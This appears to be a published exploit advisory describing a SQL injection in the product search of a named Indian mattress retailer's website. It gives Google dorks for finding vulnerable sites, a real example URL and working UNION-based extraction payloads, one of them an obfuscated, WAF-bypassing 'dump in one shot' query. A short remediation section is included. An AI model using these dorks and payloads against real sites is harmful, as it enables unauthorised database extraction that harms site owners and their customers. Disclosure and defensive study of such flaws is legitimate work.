SleePedia.in an initiative of SleepwellFoundation India Nepal Bhutan SQL Injection Vulnerability

2018.06.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#################################################################################################
# Exploit Title : SleePedia.in an initiative of SleepwellFoundation India Nepal Bhutan SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 21/06/2018
# Vendor Homepage : sleepedia.in ~ sleepwellfoundation.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dorks :
#   inurl:''/products/searchByKeyword/?keyword_search=''
#   inurl:''/cms/store_locator''
#   inurl:''/products/product_detail/''
# Note : Search in this domain extensions => site:np site:in site:bt site:com site:net site:org
# Vulnerable parameter : the `keyword_search` GET parameter of /products/searchByKeyword/ is placed
#   unescaped inside a LIKE '%...%' string literal (the leaked query in the error output below shows
#   `like '%.1'%'`), so a single quote breaks out of the literal; that is what the UNION SELECT
#   payloads below rely on.
# Exploit : /products/searchByKeyword/?keyword_search=.1'
# + Data => LOCALHOST/products/searchByKeyword/?keyword_search=.1%27%20union%20select%201,2,3,4,group_concat(table_name,column_name),6,7,8,9,10,11,12,13%20from%20information_schema.columns%20where%20table_schema=database()--+-
#   (the UNION uses 13 columns because the original SELECT returns 13 columns; the trailing `--+-`
#   comments out the remainder of the application's query, i.e. the closing `%' ... group by V.pid`)
# + Dump in one shot =>
LOCALHOST/products/searchByKeyword/?keyword_search=.1%27%20union%20select%201,2,3,4,concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0)%20from(information_schema./**/columns)where(table_schema=database())%20and(0x00)in(@x:=Concat/*!(@x,%200x3c62723e,%20if(%20(@tbl!=table_name),%20Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1,%202,%200x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e),%200x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/,6,7,8,9,10,11,12,13%20from%20information_schema.columns%20where%20table_schema=database()--+- ################################################################################################# # Example Site : sleepwellproducts.com/products/searchByKeyword/?keyword_search=.1%27 => [ Proof of Concept for SQL Inj ] => archive.is/8wz2E # SQL Database Error : A Database Error Occurred Error Number: 1064 You have an error 
in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or V.product_Specification like '%.1'%' group by V.pid' at line 10
SELECT V.`id`, V.`cid`, V.`scid`,V.`pid`, V.`product_name`, V.`length`, V.`thickness`, V.`breadth`, V.`price`, V.`status`, V.`state`,P.slug, P.detail_image FROM `sw_product_variant` V, sw_product P WHERE V.pid = P.id AND V.`status` = '1' AND P.status='1' AND V.price!='0' AND V.list_show='1' AND V.state='' and V.product_name like '%.1'%' or V.product_Specification like '%.1'%' group by V.pid
Filename: models/Product_model.php Line Number: 1152
# Analysis : the submitted value `.1'` appears verbatim in both LIKE clauses (`like '%.1'%'`), so the keyword is concatenated into the SQL string with no quoting or parameter binding. The verbose database error page is a second, independent weakness: it discloses the complete query, the table names (`sw_product_variant`, `sw_product`), the column names and a server-side source file path with line number, which is exactly the information an attacker needs to build the UNION-based extraction shown above.
# Remediation : bind the keyword as a query parameter (e.g. `WHERE V.product_name LIKE ?` with the `%...%` wildcards added to the bound value, and `%` / `_` escaped in the user input if a literal match is intended) instead of string concatenation, and disable verbose database errors in production so that a failed query returns a generic message rather than the SQL text and file path.
+ Proof of Concept : archive.is/h20Ww - archive.is/hKhSa
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################

